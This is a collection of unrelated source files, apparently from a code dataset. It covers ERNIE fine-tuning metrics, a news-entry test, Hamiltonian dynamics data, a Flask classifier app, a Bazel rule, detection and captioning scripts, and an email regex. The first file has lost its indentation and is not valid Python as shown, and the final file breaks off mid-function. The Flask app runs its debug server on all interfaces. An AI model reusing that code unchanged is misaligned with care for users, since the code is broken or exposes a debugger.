src_ids = fluid.layers.data(name='eval_placeholder_0', shape=[-1, args.max_seq_len, 1], dtype='int64')
sent_ids = fluid.layers.data(name='eval_placeholder_1', shape=[-1, args.max_seq_len, 1], dtype='int64')
pos_ids = fluid.layers.data(name='eval_placeholder_2', shape=[-1, args.max_seq_len, 1], dtype='int64')
input_mask = fluid.layers.data(name='eval_placeholder_3', shape=[-1, args.max_seq_len, 1], dtype='float32')
task_ids = fluid.layers.data(name='eval_placeholder_4', shape=[-1, args.max_seq_len, 1], dtype='int64')
qids = fluid.layers.data(name='eval_placeholder_5', shape=[-1, 1], dtype='int64')
if is_classify:
labels = fluid.layers.data(name='6', shape=[-1, 1], dtype='int64')
elif is_regression:
labels = fluid.layers.data(name='6', shape=[-1, 1], dtype='float32')
pyreader = fluid.io.DataLoader.from_generator(feed_list=[src_ids, sent_ids, pos_ids, task_ids, input_mask, labels, qids],
capacity=70,
iterable=False)
ernie = ErnieModel(
src_ids=src_ids,
position_ids=pos_ids,
sentence_ids=sent_ids,
task_ids=task_ids,
input_mask=input_mask,
config=ernie_config,
use_fp16=args.use_fp16)
cls_feats = ernie.get_pooled_output()
cls_feats = fluid.layers.dropout(
x=cls_feats,
dropout_prob=0.1,
dropout_implementation="upscale_in_train")
logits = fluid.layers.fc(
input=cls_feats,
size=args.num_labels,
param_attr=fluid.ParamAttr(
name=task_name + "_cls_out_w",
initializer=fluid.initializer.TruncatedNormal(scale=0.02)),
bias_attr=fluid.ParamAttr(
name=task_name + "_cls_out_b",
initializer=fluid.initializer.Constant(0.)))
assert is_classify != is_regression, 'is_classify or is_regression must be true and only one of them can be true'
if is_prediction:
if is_classify:
probs = fluid.layers.softmax(logits)
else:
probs = logits
feed_targets_name = [
src_ids.name, sent_ids.name, pos_ids.name, input_mask.name
]
if ernie_version == "2.0":
feed_targets_name += [task_ids.name]
return pyreader, probs, feed_targets_name
num_seqs = fluid.layers.create_tensor(dtype='int64')
if is_classify:
ce_loss, probs = fluid.layers.softmax_with_cross_entropy(
logits=logits, label=labels, return_softmax=True)
loss = fluid.layers.mean(x=ce_loss)
accuracy = fluid.layers.accuracy(
input=probs, label=labels, total=num_seqs)
graph_vars = {
"loss": loss,
"probs": probs,
"accuracy": accuracy,
"labels": labels,
"num_seqs": num_seqs,
"qids": qids
}
elif is_regression:
cost = fluid.layers.square_error_cost(input=logits, label=labels)
loss = fluid.layers.mean(x=cost)
graph_vars = {
"loss": loss,
"probs": logits,
"labels": labels,
"num_seqs": num_seqs,
"qids": qids
}
else:
raise ValueError(
'unsupported fine tune mode. only supported classify/regression')
return pyreader, graph_vars
def evaluate_mrr(preds):
last_qid = None
total_mrr = 0.0
qnum = 0.0
rank = 0.0
correct = False
for qid, score, label in preds:
if qid != last_qid:
rank = 0.0
qnum += 1
correct = False
last_qid = qid
rank += 1
if not correct and label != 0:
total_mrr += 1.0 / rank
correct = True
return total_mrr / qnum
def evaluate_map(preds):
def singe_map(st, en):
total_p = 0.0
correct_num = 0.0
for index in xrange(st, en):
if int(preds[index][2]) != 0:
correct_num += 1
total_p += correct_num / (index - st + 1)
if int(correct_num) == 0:
return 0.0
return total_p / correct_num
last_qid = None
total_map = 0.0
qnum = 0.0
st = 0
for i in xrange(len(preds)):
qid = preds[i][0]
if qid != last_qid:
qnum += 1
if last_qid != None:
total_map += singe_map(st, i)
st = i
last_qid = qid
total_map += singe_map(st, len(preds))
return total_map / qnum
def evaluate_classify(exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=False,
metric='simple_accuracy',
is_classify=False,
is_regression=False):
train_fetch_list = [
graph_vars["loss"].name, graph_vars["accuracy"].name,
graph_vars["num_seqs"].name
]
if eval_phase == "train":
if "learning_rate" in graph_vars:
train_fetch_list.append(graph_vars["learning_rate"].name)
outputs = exe.run(fetch_list=train_fetch_list)
ret = {"loss": np.mean(outputs[0]), "accuracy": np.mean(outputs[1])}
if "learning_rate" in graph_vars:
ret["learning_rate"] = float(outputs[3][0])
return ret
test_pyreader.start()
total_cost, total_acc, total_num_seqs, total_label_pos_num, total_pred_pos_num, total_correct_num = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
qids, labels, scores, preds = [], [], [], []
time_begin = time.time()
fetch_list = [
graph_vars["loss"].name, graph_vars["accuracy"].name,
graph_vars["probs"].name, graph_vars["labels"].name,
graph_vars["num_seqs"].name, graph_vars["qids"].name
]
while True:
try:
if use_multi_gpu_test:
np_loss, np_acc, np_probs, np_labels, np_num_seqs, np_qids = exe.run(
fetch_list=fetch_list)
else:
np_loss, np_acc, np_probs, np_labels, np_num_seqs, np_qids = exe.run(
program=test_program, fetch_list=fetch_list)
total_cost += np.sum(np_loss * np_num_seqs)
total_acc += np.sum(np_acc * np_num_seqs)
total_num_seqs += np.sum(np_num_seqs)
labels.extend(np_labels.reshape((-1)).tolist())
if np_qids is None:
np_qids = np.array([])
qids.extend(np_qids.reshape(-1).tolist())
scores.extend(np_probs[:, 1].reshape(-1).tolist())
np_preds = np.argmax(np_probs, axis=1).astype(np.float32)
preds.extend(np_preds)
total_label_pos_num += np.sum(np_labels)
total_pred_pos_num += np.sum(np_preds)
total_correct_num += np.sum(np.dot(np_preds, np_labels))
except fluid.core.EOFException:
test_pyreader.reset()
break
time_end = time.time()
cost = total_cost / total_num_seqs
elapsed_time = time_end - time_begin
evaluate_info = ""
if metric == 'acc_and_f1':
ret = acc_and_f1(preds, labels)
evaluate_info = "[%s evaluation] ave loss: %f, ave_acc: %f, f1: %f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret['acc'], ret['f1'], total_num_seqs, elapsed_time)
elif metric == 'matthews_corrcoef':
ret = matthews_corrcoef(preds, labels)
evaluate_info = "[%s evaluation] ave loss: %f, matthews_corrcoef: %f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret, total_num_seqs, elapsed_time)
elif metric == 'pearson_and_spearman':
ret = pearson_and_spearman(scores, labels)
evaluate_info = "[%s evaluation] ave loss: %f, pearson:%f, spearman:%f, corr:%f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret['pearson'], ret['spearman'], ret['corr'], total_num_seqs, elapsed_time)
elif metric == 'simple_accuracy':
ret = simple_accuracy(preds, labels)
evaluate_info = "[%s evaluation] ave loss: %f, acc:%f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret, total_num_seqs, elapsed_time)
evaluate_info = "loss:%f acc:%0.2f data_nums:%d time:%fs" \
% (cost, ret, total_num_seqs, elapsed_time)
elif metric == "acc_and_f1_and_mrr":
ret_a = acc_and_f1(preds, labels)
preds = sorted(
zip(qids, scores, labels), key=lambda elem: (elem[0], -elem[1]))
ret_b = evaluate_mrr(preds)
evaluate_info = "[%s evaluation] ave loss: %f, acc: %f, f1: %f, mrr: %f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret_a['acc'], ret_a['f1'], ret_b, total_num_seqs, elapsed_time)
else:
raise ValueError('unsupported metric {}'.format(metric))
return evaluate_info
def evaluate_regression(exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=False,
metric='pearson_and_spearman'):
if eval_phase == "train":
train_fetch_list = [graph_vars["loss"].name]
if "learning_rate" in graph_vars:
train_fetch_list.append(graph_vars["learning_rate"].name)
outputs = exe.run(fetch_list=train_fetch_list)
ret = {"loss": np.mean(outputs[0])}
if "learning_rate" in graph_vars:
ret["learning_rate"] = float(outputs[1][0])
return ret
test_pyreader.start()
total_cost, total_num_seqs = 0.0, 0.0
qids, labels, scores = [], [], []
fetch_list = [
graph_vars["loss"].name, graph_vars["probs"].name,
graph_vars["labels"].name, graph_vars["qids"].name
]
time_begin = time.time()
while True:
try:
if use_multi_gpu_test:
np_loss, np_probs, np_labels, np_qids = exe.run(
fetch_list=fetch_list)
else:
np_loss, np_probs, np_labels, np_qids = exe.run(
program=test_program, fetch_list=fetch_list)
labels.extend(np_labels.reshape((-1)).tolist())
if np_qids is None:
np_qids = np.array([])
qids.extend(np_qids.reshape(-1).tolist())
scores.extend(np_probs.reshape(-1).tolist())
except fluid.core.EOFException:
test_pyreader.reset()
break
time_end = time.time()
elapsed_time = time_end - time_begin
if metric == 'pearson_and_spearman':
ret = pearson_and_spearman(scores, labels)
evaluate_info = "[%s evaluation] ave loss: %f, pearson:%f, spearman:%f, corr:%f, elapsed time: %f s" \
% (eval_phase, 0.0, ret['pearson'], ret['spearmanr'], ret['corr'], elapsed_time)
else:
raise ValueError('unsupported metric {}'.format(metric))
return evaluate_info
def evaluate(exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=False,
metric='simple_accuracy',
is_classify=False,
is_regression=False):
if is_classify:
return evaluate_classify(
exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=use_multi_gpu_test,
metric=metric)
else:
return evaluate_regression(
exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=use_multi_gpu_test,
metric=metric)
def matthews_corrcoef(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
tp = np.sum((labels == 1) & (preds == 1))
tn = np.sum((labels == 0) & (preds == 0))
fp = np.sum((labels == 0) & (preds == 1))
fn = np.sum((labels == 1) & (preds == 0))
mcc = ((tp * tn) - (fp * fn)) / np.sqrt(
(tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
return mcc
def f1_score(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
tp = np.sum((labels == 1) & (preds == 1))
tn = np.sum((labels == 0) & (preds == 0))
fp = np.sum((labels == 0) & (preds == 1))
fn = np.sum((labels == 1) & (preds == 0))
p = tp / (tp + fp)
r = tp / (tp + fn)
f1 = (2 * p * r) / (p + r + 1e-8)
return f1
def pearson_and_spearman(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
pearson_corr = pearsonr(preds, labels)[0]
spearman_corr = spearmanr(preds, labels)[0]
return {
"pearson": pearson_corr,
"spearmanr": spearman_corr,
"corr": (pearson_corr + spearman_corr) / 2,
}
def acc_and_f1(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
acc = simple_accuracy(preds, labels)
f1 = f1_score(preds, labels)
return {
"acc": acc,
"f1": f1,
"acc_and_f1": (acc + f1) / 2,
}
def simple_accuracy(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
return (preds == labels).mean()
def predict(exe,
test_program,
test_pyreader,
graph_vars,
dev_count=1,
is_classify=False,
is_regression=False):
test_pyreader.start()
qids, scores, probs = [], [], []
preds = []
fetch_list = [graph_vars["probs"].name, graph_vars["qids"].name]
while True:
try:
if dev_count == 1:
np_probs, np_qids = exe.run(program=test_program,
fetch_list=fetch_list)
else:
np_probs, np_qids = exe.run(fetch_list=fetch_list)
if np_qids is None:
np_qids = np.array([])
qids.extend(np_qids.reshape(-1).tolist())
if is_classify:
np_preds = np.argmax(np_probs, axis=1).astype(np.float32)
preds.extend(np_preds)
elif is_regression:
preds.extend(np_probs.reshape(-1))
probs.append(np_probs)
except fluid.core.EOFException:
test_pyreader.reset()
break
probs = np.concatenate(probs, axis=0).reshape([len(preds), -1])
return qids, preds, probs
|
the-stack_106_13076
|
"""Testing that news entries are well formed."""
import os
import re
import pytest
NEWSDIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), "news")
CATEGORIES = frozenset(
["Added", "Changed", "Deprecated", "Removed", "Fixed", "Security"]
)
single_grave_reg = re.compile(r"[^`]`[^`]+`[^`_]")
def check_news_file(fname):
import restructuredtext_lint
name = fname.name
with open(fname.path) as f:
content = f.read()
errors = restructuredtext_lint.lint(content)
if errors:
err_msgs = os.linesep.join(err.message for err in errors)
pytest.fail(f"{fname}: Invalid ReST\n{err_msgs}")
form = ""
for i, l in enumerate(content.splitlines()):
# determine the form of line
if l.startswith("**"):
cat = l[2:].rsplit(":")[0]
if cat not in CATEGORIES:
pytest.fail(
"{}:{}: {!r} not a proper category "
"must be one of {}"
"".format(name, i + 1, cat, list(CATEGORIES)),
pytrace=True,
)
if l.endswith("None"):
form += "3"
else:
form += "2"
elif l.startswith("* <news item>"):
form += "4"
elif l.startswith("* ") or l.startswith("- ") or l.startswith(" "):
form += "1"
elif l.strip() == "":
form += "0"
else:
pytest.fail(f"{name}:{i + 1}: invalid rst", pytrace=True)
# The file should have:
# empty lines around categories
# at least one content line in a non null category
reg = re.compile(r"^(3(0|$)|20(1|4)(1|0|4)*0|204$)+$")
if not reg.match(form):
print(form)
pytest.fail(f"{name}: invalid rst", pytrace=True)
@pytest.fixture(params=list(os.scandir(NEWSDIR)))
def fname(request):
if request.node.config.option.markexpr != "news":
pytest.skip("Run news items check explicitly")
return request.param
@pytest.mark.news
def test_news(fname):
base, ext = os.path.splitext(fname.path)
assert "rst" in ext
check_news_file(fname)
|
the-stack_106_13077
|
# Hamiltonian Neural Networks | 2019
# Sam Greydanus, Misko Dzamba, Jason Yosinski
import autograd
import autograd.numpy as np
from scipy.stats import norm
import scipy.integrate
solve_ivp = scipy.integrate.solve_ivp
def hamiltonian_fn(coords):
# q, p = np.split(coords,2)
# mu = 2.0
# sigma = 0.15
# H = (q-mu)**2/(2*sigma) + p**2/2 # Normal PDF
q, p = np.split(coords,2)
mu1 = 1.0
mu2 = -1.0
sigma = 0.25
term1 = -np.log(0.5*(np.exp(-(q-mu1)**2/(2*sigma**2)))+0.5*(np.exp(-(q-mu2)**2/(2*sigma**2))))
H = term1 + p**2/2 # Normal PDF
return H
def dynamics_fn(t, coords):
dcoords = autograd.grad(hamiltonian_fn)(coords)
dqdt, dpdt = np.split(dcoords,2)
S = np.concatenate([dpdt, -dqdt], axis=-1)
return S
def get_trajectory(t_span=[0,20], timescale=20, radius=None, y0=None, noise_std=0.01, **kwargs):
t_eval = np.linspace(t_span[0], t_span[1], int(timescale*(t_span[1]-t_span[0])))
# get initial state
# if y0 is None:
# y0 = np.random.rand(2)*2.-1
# if radius is None:
# radius = np.random.rand() + 1.3 # sample a range of radii
if y0 is None:
y0 = np.array([0.,0.])
if np.random.rand(1)<0.5:
y0[0] = norm(loc=1.,scale=0.3).rvs()
else:
y0[0] = norm(loc=-1.,scale=0.3).rvs()
y0[1] = norm(loc=0,scale=2).rvs() # np.random.rand(1)*3-3 #
# y0 = np.random.rand(2)*1.5-1.5
# if radius is None:
# radius = np.random.rand() + 4.1 # sample a range of radii
# y0 = y0 / np.sqrt((y0**2).sum()) * radius ## set the appropriate radius
spring_ivp = solve_ivp(fun=dynamics_fn, t_span=t_span, y0=y0, t_eval=t_eval, rtol=1e-10, **kwargs)
q, p = spring_ivp['y'][0], spring_ivp['y'][1]
dydt = [dynamics_fn(None, y) for y in spring_ivp['y'].T]
dydt = np.stack(dydt).T
dqdt, dpdt = np.split(dydt,2)
# add noise
q += np.random.randn(*q.shape)*noise_std
p += np.random.randn(*p.shape)*noise_std
return q, p, dqdt, dpdt, t_eval
def get_dataset(seed=0, samples=20, test_split=1.0, **kwargs):
data = {'meta': locals()}
# randomly sample inputs
np.random.seed(seed)
xs, dxs = [], []
for s in range(samples):
x, y, dx, dy, t = get_trajectory(**kwargs)
xs.append( np.stack( [x, y]).T )
dxs.append( np.stack( [dx, dy]).T )
data['x'] = np.concatenate(xs)
data['dx'] = np.concatenate(dxs).squeeze()
# make a train/test split
split_ix = int(len(data['x']) * test_split)
split_data = {}
for k in ['x', 'dx']:
split_data[k], split_data['test_' + k] = data[k][:split_ix], data[k][split_ix:]
data = split_data
return data
def get_field(xmin=-1.2, xmax=1.2, ymin=-1.2, ymax=1.2, gridsize=20):
field = {'meta': locals()}
# meshgrid to get vector field
b, a = np.meshgrid(np.linspace(xmin, xmax, gridsize), np.linspace(ymin, ymax, gridsize))
ys = np.stack([b.flatten(), a.flatten()])
# get vector directions
dydt = [dynamics_fn(None, y) for y in ys.T]
dydt = np.stack(dydt).T
field['x'] = ys.T
field['dx'] = dydt.T
return field
|
the-stack_106_13080
|
import nltk
nltk.download('stopwords')
import json
import plotly
import pandas as pd
import string
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from flask import Flask
from flask import render_template, request, jsonify
from plotly.graph_objs import Bar
from sklearn.externals import joblib
from sqlalchemy import create_engine
from collections import Counter
import json, plotly
import numpy as np
import operator
from pprint import pprint
import re
from sklearn.base import BaseEstimator, TransformerMixin
from nltk.corpus import stopwords
app = Flask(__name__)
class WordCount(BaseEstimator, TransformerMixin):
def word_count(self, text):
table = text.maketrans(dict.fromkeys(string.punctuation))
words = word_tokenize(text.lower().strip().translate(table))
return len(words)
def fit(self, x, y=None):
return self
def transform(self, x):
count = pd.Series(x).apply(self.word_count)
return pd.DataFrame(count)
def tokenize(text):
"""
Tokenizes text data
Args:
text str: Messages as text data
Returns:
# clean_tokens list: Processed text after normalizing, tokenizing and lemmatizing
words list: Processed text after normalizing, tokenizing and lemmatizing
"""
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
words = word_tokenize(text)
stopwords_ = stopwords.words("english")
words = [word for word in words if word not in stopwords_]
# extract root form of words
words = [WordNetLemmatizer().lemmatize(word) for word in words]
return words
# load data
engine = create_engine('sqlite:///../data/DisasterResponse.db')
df = pd.read_sql_table('disaster', engine)
# load model
model = joblib.load("../models/classifier.pkl")
# index webpage displays cool visuals and receives user input text for model
@app.route('/')
@app.route('/index')
def index():
genre_counts = df.groupby('genre').count()['message']
genre_names = list(genre_counts.index)
cat_p = df[df.columns[4:]].sum()/len(df)
cat_p = cat_p.sort_values(ascending = False)
cats = list(cat_p.index)
words_with_repetition=[]
figures = [
{
'data': [
Bar(
x=genre_names,
y=genre_counts
)
],
'layout': {
'title': 'Distribution of Message Genres',
'yaxis': {
'title': "Count"
},
'xaxis': {
'title': "Genre"
}
}
},
{
'data': [
Bar(
x=cats,
y=cat_p
)
],
'layout': {
'title': 'Proportion of Messages <br> by Category',
'yaxis': {
'title': "Proportion",
'automargin':True
},
'xaxis': {
'title': "Category",
'tickangle': -40,
'automargin':True
}
}
}
]
ids = ["figure-{}".format(i) for i, _ in enumerate(figures)]
figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)
return render_template('master.html', ids=ids, figuresJSON=figuresJSON, data_set=df)
@app.route('/go')
def go():
query = request.args.get('query', '')
classification_labels = model.predict([query])[0]
classification_results = dict(zip(df.columns[4:], classification_labels))
return render_template(
'go.html',
query=query,
classification_result=classification_results
)
def main():
app.run(host='0.0.0.0', port=3001, debug=True)
if __name__ == '__main__':
main()
|
the-stack_106_13081
|
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This technique was inspired by the gazelle rule implementation in bazelbuild/rules_go:
# https://github.com/bazelbuild/rules_go/blob/86ade29284ca11deeead86c061e9ba9bd0d157e0/go/private/tools/gazelle.bzl
# Writes out a script which saves the runfiles directory,
# changes to the workspace root, and then runs a command.
def _workspace_binary_script_impl(ctx):
content_header = """#!/usr/bin/env bash
# --- begin runfiles.bash initialization v2 ---
# Copy-pasted from the Bazel Bash runfiles library v2.
set -uo pipefail; f=bazel_tools/tools/bash/runfiles/runfiles.bash
source "${RUNFILES_DIR:-/dev/null}/$f" 2>/dev/null || \
source "$(grep -sm1 "^$f " "${RUNFILES_MANIFEST_FILE:-/dev/null}" | cut -f2- -d' ')" 2>/dev/null || \
source "$0.runfiles/$f" 2>/dev/null || \
source "$(grep -sm1 "^$f " "$0.runfiles_manifest" | cut -f2- -d' ')" 2>/dev/null || \
source "$(grep -sm1 "^$f " "$0.exe.runfiles_manifest" | cut -f2- -d' ')" 2>/dev/null || \
{ echo>&2 "ERROR: cannot find $f"; exit 1; }; f=; set -e
# --- end runfiles.bash initialization v2 ---
"""
content = content_header + """
set -o errexit
set -o nounset
set -o pipefail
BASE=$(pwd)
cd $(dirname $(readlink {root_file}))
"$BASE/{cmd}" $@
""".format(
cmd = ctx.file.cmd.short_path,
root_file = ctx.file.root_file.short_path,
)
ctx.actions.write(
output = ctx.outputs.executable,
content = content,
is_executable = True,
)
runfiles = ctx.runfiles(
files = [
ctx.file.cmd,
ctx.file.root_file,
] + ctx.files._bash_runfiles,
)
return [DefaultInfo(runfiles = runfiles)]
_workspace_binary_script = rule(
attrs = {
"cmd": attr.label(
mandatory = True,
allow_single_file = True,
),
"root_file": attr.label(
mandatory = True,
allow_single_file = True,
),
"_bash_runfiles": attr.label(
allow_files = True,
default = "@bazel_tools//tools/bash/runfiles",
),
},
executable = True,
implementation = _workspace_binary_script_impl,
)
# Wraps a binary to be run in the workspace root via bazel run.
#
# For example, one might do something like
#
# workspace_binary(
# name = "dep",
# cmd = "//vendor/github.com/golang/dep/cmd/dep",
# )
#
# which would allow running dep with bazel run.
def workspace_binary(
name,
cmd,
args = None,
visibility = None,
data = None,
root_file = "//:WORKSPACE"):
script_name = name + "_script"
_workspace_binary_script(
name = script_name,
cmd = cmd,
root_file = root_file,
tags = ["manual"],
)
native.sh_binary(
name = name,
srcs = [":" + script_name],
args = args,
data = data,
visibility = visibility,
tags = ["manual"],
)
|
the-stack_106_13083
|
_base_ = [
'../_base_/models/retinanet_r50_fpn.py',
'../_base_/datasets/coco_detection.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
bbox_head=dict(
type='RetinaHead',
num_classes=80,
in_channels=256,
stacked_convs=4,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
octave_base_scale=4,
scales_per_octave=3,
ratios=[0.5, 1.0, 2.0],
strides=[8, 16, 32, 64, 128]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0.0, 0.0, 0.0, 0.0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
use_vfl=True,
loss_cls_vfl=dict(
type='VarifocalLoss',
use_sigmoid=True,
alpha=0.75,
gamma=2.0,
iou_weighted=True,
loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)))
data = dict(samples_per_gpu=4, workers_per_gpu=4)
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.1,
step=[8, 11])
total_epochs = 12
checkpoint_config = dict(interval=1)
log_config = dict(interval=50, hooks=[dict(type='TextLoggerHook')])
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
the-stack_106_13085
|
import glob
import pathlib
import pickle
import numpy as np
from nltk.translate.bleu_score import corpus_bleu
from sklearn.model_selection import train_test_split
from tensorflow.keras.applications.vgg16 import *
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.layers import *
from tensorflow.keras.models import *
from tensorflow.keras.preprocessing.sequence import \
pad_sequences
from ch7.recipe1.extract_features import ImageCaptionFeatureExtractor
BASE_PATH = (pathlib.Path.home() / '.keras' / 'datasets' /
'flickr8k')
IMAGES_PATH = str(BASE_PATH / 'Images')
CAPTIONS_PATH = str(BASE_PATH / 'captions.txt')
OUTPUT_PATH = '.'
def load_paths_and_captions():
image_paths = list(glob.glob(f'{IMAGES_PATH}/*.jpg'))
with open(f'{CAPTIONS_PATH}', 'r') as f:
text = f.read()
lines = text.split('\n')
mapping = {}
for line in lines:
if '.jpg' not in line:
continue
tokens = line.split(',', maxsplit=1)
if len(line) < 2:
continue
image_id, image_caption = tokens
image_id = image_id.split('.')[0]
captions_per_image = mapping.get(image_id, [])
captions_per_image.append(image_caption)
mapping[image_id] = captions_per_image
all_captions = []
for image_path in image_paths:
image_id = image_path.split('/')[-1].split('.')[0]
all_captions.append(mapping[image_id][0])
return image_paths, all_captions
def build_network(vocabulary_size,
max_sequence_length,
input_shape=(4096,)):
feature_inputs = Input(shape=input_shape)
x = Dropout(rate=0.5)(feature_inputs)
x = Dense(units=256)(x)
feature_output = ReLU()(x)
sequence_inputs = Input(shape=(max_sequence_length,))
y = Embedding(input_dim=vocabulary_size,
output_dim=256,
mask_zero=True)(sequence_inputs)
y = Dropout(rate=0.5)(y)
sequence_output = LSTM(units=256)(y)
z = Add()([feature_output, sequence_output])
z = Dense(units=256)(z)
z = ReLU()(z)
z = Dense(units=vocabulary_size)(z)
outputs = Softmax()(z)
return Model(inputs=[feature_inputs, sequence_inputs],
outputs=outputs)
def get_word_from_index(tokenizer, index):
return tokenizer.index_word.get(index, None)
def produce_caption(model,
tokenizer,
image,
max_sequence_length):
text = 'beginsequence'
for i in range(max_sequence_length):
sequence = tokenizer.texts_to_sequences([text])[0]
sequence = pad_sequences([sequence],
maxlen=max_sequence_length)
prediction = model.predict([[image], sequence])
index = np.argmax(prediction)
word = get_word_from_index(tokenizer, index)
if word is None:
break
text += f' {word}'
if word == 'endsequence':
break
return text
def evaluate_model(model, features, captions, tokenizer,
max_seq_length):
actual = []
predicted = []
for feature, caption in zip(features, captions):
generated_caption = produce_caption(model,
tokenizer,
feature,
max_seq_length)
actual.append([caption.split(' ')])
predicted.append(generated_caption.split(' '))
for index, weights in enumerate([(1.0, 0, 0, 0),
(0.5, 0.5, 0, 0),
(0.3, 0.3, 0.3, 0),
(0.25, 0.25, 0.25, 0.25)],
start=1):
b_score = corpus_bleu(actual, predicted, weights)
print(f'BLEU-{index}: {b_score}')
image_paths, all_captions = load_paths_and_captions()
extractor_model = VGG16(weights='imagenet')
inputs = extractor_model.inputs
outputs = extractor_model.layers[-2].output
extractor_model = Model(inputs=inputs, outputs=outputs)
extractor = ImageCaptionFeatureExtractor(
feature_extractor=extractor_model,
output_path=OUTPUT_PATH)
extractor.extract_features(image_paths, all_captions)
pickled_data = []
for p in [f'{OUTPUT_PATH}/input_features.pickle',
f'{OUTPUT_PATH}/input_sequences.pickle',
f'{OUTPUT_PATH}/output_sequences.pickle']:
with open(p, 'rb') as f:
pickled_data.append(pickle.load(f))
input_feats, input_seqs, output_seqs = pickled_data
(train_input_feats, test_input_feats,
train_input_seqs, test_input_seqs,
train_output_seqs,
test_output_seqs) = train_test_split(input_feats,
input_seqs,
output_seqs,
train_size=0.8,
random_state=9)
vocabulary_size = len(extractor.tokenizer.word_index) + 1
model = build_network(vocabulary_size,
extractor.max_seq_length)
model.compile(loss='categorical_crossentropy',
optimizer='adam')
checkpoint_path = ('model-ep{epoch:03d}-loss{loss:.3f}-'
'val_loss{val_loss:.3f}.h5')
checkpoint = ModelCheckpoint(checkpoint_path,
monitor='val_loss',
verbose=1,
save_best_only=True,
mode='min')
checkpoints = sorted(list(glob.glob('./*.h5')), reverse=True)
if len(checkpoints) > 0:
model = load_model(checkpoints[0])
else:
EPOCHS = 30
model.fit(x=[train_input_feats, train_input_seqs],
y=train_output_seqs,
epochs=EPOCHS,
callbacks=[checkpoint],
validation_data=([test_input_feats, test_input_seqs],
test_output_seqs))
with open(f'{OUTPUT_PATH}/data_mapping.pickle', 'rb') as f:
data_mapping = pickle.load(f)
feats = [v['features'] for v in data_mapping.values()]
captions = [v['caption'] for v in data_mapping.values()]
evaluate_model(model,
features=feats,
captions=captions,
tokenizer=extractor.tokenizer,
max_seq_length=extractor.max_seq_length)
|
the-stack_106_13087
|
# def geomProg(a,b,c):
# """a - число которое в гепрогресию
# b - количество шагов в прогрессии
# с - на сколько множим"""
# for i in range(b):
# yield a
# a *= c
# test = geomProg(2, 10, 2)
# for i in test:
# print(i)
import re
file = '[email protected]'
regex = r"^([a-z0-9_-_!#%&'\"_`+/=?{}|~-]+\.)*[a-z0-9_-_!#%&'\"`+/=?{}|~]+@(([a-z0-9]+[\-_?]*[a-z0-9]+)*\.[a-z]{2,6}){0,63}$"
recheck = re.fullmatch(regex, file)
print(recheck)
|
the-stack_106_13091
|
from dlpipe.processors.processor_interface import IPreProcessor
import numpy as np
DATA_INFO = {
"age": {"norm": 98},
"nr_person_hurt": {"norm": 3},
"nr_vehicles": {"norm": 4}
}
class PreProcessData(IPreProcessor):
def process(self, raw_data, input_data, ground_truth, piped_params=None):
ground_truth = np.zeros(3)
if "accident_severity" in raw_data:
index = min(int(raw_data["accident_severity"]), 2)
ground_truth[index] = 1.0
list_input = []
# sin and cos components are already normalized
list_input.append(float(raw_data["date"]["sin"]))
list_input.append(float(raw_data["date"]["cos"]))
list_input.append(float(raw_data["time"]["sin"]))
list_input.append(float(raw_data["time"]["cos"]))
# normalize features
list_input.append(int(raw_data["age"]) / DATA_INFO["age"]["norm"])
list_input.append(int(raw_data["nr_person_hurt"]) / DATA_INFO["nr_person_hurt"]["norm"])
list_input.append(int(raw_data["nr_vehicles"]) / DATA_INFO["nr_vehicles"]["norm"])
# some classification features have "unknown" columns at the end which are sliced off
list_input += raw_data["class"]["encoded"]
list_input += raw_data["light"]["encoded"]
list_input += raw_data["weather"]["encoded"][:-1]
list_input += raw_data["ground_condition"]["encoded"][:-1]
list_input += raw_data["gender"]["encoded"]
list_input += raw_data["vehicle_type"]["encoded"][:-1]
list_input += raw_data["road_type"]["encoded"][:-1]
input_data = np.asarray(list_input)
return raw_data, input_data, ground_truth, piped_params
|
the-stack_106_13094
|
from common import ProblemType
from solver import Solver
from gui import Gui
import images
def multires(nelx, nely, params, bc):
# Allocate design variables for the first level
x = None
x_comp = None
# Dynamic parameters
downsampling = 2**(params.numLevels - 1)
params.exemplarDownsampling *= downsampling
# Multires synthesis
